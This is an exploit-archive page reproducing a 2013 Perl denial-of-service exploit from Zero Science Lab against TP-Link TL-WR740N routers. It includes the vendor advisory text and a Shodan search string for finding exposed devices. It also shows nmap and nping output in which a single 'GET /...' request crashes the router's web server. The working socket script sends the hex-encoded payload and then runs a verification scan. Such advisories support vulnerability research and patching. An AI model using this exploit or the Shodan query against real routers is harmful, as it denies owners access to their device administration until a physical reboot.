Home / exploits TP-Link TL-WR740N Wireless Router Remote Denial Of Service
Posted on 21 March 2013
#!/usr/local/bin/perl # # # TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit # # # Vendor: TP-LINK Technologies Co., Ltd. # Product web page: http://www.tp-link.us # # Affected version: # # - Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013) # - Hardware version: WR740N v4 00000000 (v4.23) # - Model No. TL-WR740N / TL-WR740ND # # Summary: The TL-WR740N is a combined wired/wireless network connection # device integrated with internet-sharing router and 4-port switch. The # wireless N Router is 802.11b&g compatible based on 802.11n technology # and gives you 802.11n performance up to 150Mbps at an even more affordable # price. Bordering on 11n and surpassing 11g speed enables high bandwidth # consuming applications like video streaming to be more fluid. # # Desc: The TP-Link WR740N Wireless N Router network device is exposed to a # remote denial of service vulnerability when processing a HTTP request. This # issue occurs when the web server (httpd) fails to handle a HTTP GET request # over a given default TCP port 80. Sending a sequence of three dots (...) to # the router will crash its httpd service denying the legitimate users access # to the admin control panel management interface. To bring back the http srv # and the admin UI, a user must physically reboot the router. # # # ============================== Playground: ============================== # # Shodan: WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" # # # nmap -sV 192.168.0.1 # # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:53 Central European Standard Time # Nmap scan report for 192.168.0.1 # Host is up (0.00s latency). # Not shown: 999 closed ports # PORT STATE SERVICE VERSION # 80/tcp open http TP-LINK WR740N WAP http config # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.) # Service Info: Device: WAP # # Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . # Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds # # -------------------------------------------------------------------------- # Changed Probe Directive in nmap-service-probes file [4 d range]: # - Line: 4682: Probe TCP GetRequest q|GET / HTTP/1.0 | # + Line: 4682: Probe TCP GetRequest q|GET /... HTTP/1.0 | # -------------------------------------------------------------------------- # # # nping -c1 --tcp -p80 192.168.0.1 --data "474554202f2e2e2e20485454502f312e310d0a0d0a" # # Starting Nping 0.6.01 ( http://nmap.org/nping ) at 2013-03-19 04:55 Central European Standard Time # SENT (0.0920s) TCP 192.168.0.101:19835 > 192.168.0.1:80 S ttl=64 id=21796 iplen=61 seq=1961954057 win=1480 # RCVD (0.1220s) TCP 192.168.0.1:80 > 192.168.0.101:19835 RA ttl=64 id=0 iplen=40 seq=0 win=0 # # Max rtt: 0.000ms | Min rtt: 0.000ms | Avg rtt: 0.000ms # Raw packets sent: 1 (75B) | Rcvd: 1 (46B) | Lost: 0 (0.00%) # Tx time: 0.04000s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00 # Rx time: 1.04000s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96 # Nping done: 1 IP address pinged in 1.12 seconds # # -------------------------------------------------------------------------- # # # nmap -Pn 192.168.0.1 -p80 # # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:57 Central European Standard Time # Nmap scan report for 192.168.0.1 # Host is up (0.00s latency). # PORT STATE SERVICE # 80/tcp closed http # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.) # # Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds # # ============================= !Playground =============================== # # # Tested on: Router Webserver # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # Copyleft (c) 2013, Zero Science Lab # Macedonian Information Security Research And Development Laboratory # http://www.zeroscience.mk # # # Advisory ID: ZSL-2013-5135 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php # # # 17.03.2013 # use IO::Socket; $ip="$ARGV[0]"; $port="$ARGV[1]"; print " x20"."x1f"x42 ." "; print "x20x1f"."x20"x40 ."x1f "; print "x20x1f TP-Link TL-WR740N httpd DoS Exploit x1f "; print "x20x1f"."x20"x40 ."x1f "; print "x20x1f"."x20"x7 ."x16"x5 ."x20"x15 ."x16"x5 ."x20"x8 ."x1f "; print "x20x1f"."x20"x9 ."x16"."x20"x19 ."x16"."x20"x10 ."x1f "; print "x20" ."x1f"x42 ." "; print "x20x4" ."x20"x40 ."x4 "; print "x20" ."x1e" x 42 ." "; if($#ARGV<1) { print " x20x20x1ax20Usage: $0 <ip> <port> "; exit(); } $socket=IO::Socket::INET->new( Proto => "tcp", PeerAddr => $ip, PeerPort => $port ); $ta4ke="x47x45x54x20". "x2fx2ex2ex2e". "x20x48x54x54". "x50x2fx31x2e". "x31x0dx0ax0d". "x0a"; print " x20x1ax20Sending evil payload... "; sleep 2; print $socket "$ta4ke"; sleep 5; close $socket; print "x20x1ax20HTTPd successfully poked. "; sleep 2; print "x20x1ax20Verifying with Nmap... "; sleep 2; system("nmap -Pn $ip -p $port"); print " x20x1ax20Playing goa-psy... "; sleep 2; system("start C:\Progra~1\Winamp\winamp.exe http://scfire-ntc-aa01.stream.aol.com:80/stream/1008"); sleep 1; print "x20x1ax20All Done! "; sleep 1; # Codename: Threetwoees
